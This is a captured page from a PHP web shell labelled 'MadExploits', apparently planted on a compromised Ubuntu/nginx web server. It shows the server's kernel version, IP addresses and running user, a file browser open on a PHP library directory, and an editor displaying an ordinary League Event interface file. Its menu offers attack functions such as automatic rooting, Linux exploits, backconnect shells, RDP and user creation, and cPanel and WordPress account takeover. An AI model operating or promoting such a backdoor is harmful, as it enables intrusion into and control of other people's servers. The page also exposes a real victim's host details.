Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core /
vendor /
league /
event /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
AbstractEvent.php
988
B
-rw-rw-r--
AbstractListener.php
222
B
-rw-rw-r--
BufferedEmitter.php
811
B
-rw-rw-r--
CallbackListener.php
1.14
KB
-rw-rw-r--
Emitter.php
6.01
KB
-rw-rw-r--
EmitterAwareInterface.php
363
B
-rw-rw-r--
EmitterAwareTrait.php
669
B
-rw-rw-r--
EmitterInterface.php
2.19
KB
-rw-rw-r--
EmitterTrait.php
2.87
KB
-rw-rw-r--
Event.php
631
B
-rw-rw-r--
EventInterface.php
702
B
-rw-rw-r--
Generator.php
141
B
-rw-rw-r--
GeneratorInterface.php
194
B
-rw-rw-r--
GeneratorTrait.php
627
B
-rw-rw-r--
ListenerAcceptor.php
843
B
-rw-rw-r--
ListenerAcceptorInterface.php
1.53
KB
-rw-rw-r--
ListenerInterface.php
407
B
-rw-rw-r--
ListenerProviderInterface.php
285
B
-rw-rw-r--
OneTimeListener.php
1.15
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ListenerAcceptorInterface.php
<?php namespace League\Event; interface ListenerAcceptorInterface { /** * High priority. * * @const int */ const P_HIGH = 100; /** * Normal priority. * * @const int */ const P_NORMAL = 0; /** * Low priority. * * @const int */ const P_LOW = -100; /** * Add a listener for an event. * * The first parameter should be the event name, and the second should be * the event listener. It may implement the League\Event\ListenerInterface * or simply be "callable". In this case, the priority emitter also accepts * an optional third parameter specifying the priority as an integer. You * may use one of our predefined constants here if you want. * * @param string $event * @param ListenerInterface|callable $listener * @param int $priority * * @return $this */ public function addListener($event, $listener, $priority = self::P_NORMAL); /** * Add a one time listener for an event. * * The first parameter should be the event name, and the second should be * the event listener. It may implement the League\Event\ListenerInterface * or simply be "callable". * * @param string $event * @param ListenerInterface|callable $listener * @param int $priority * * @return $this */ public function addOneTimeListener($event, $listener, $priority = self::P_NORMAL); }
Close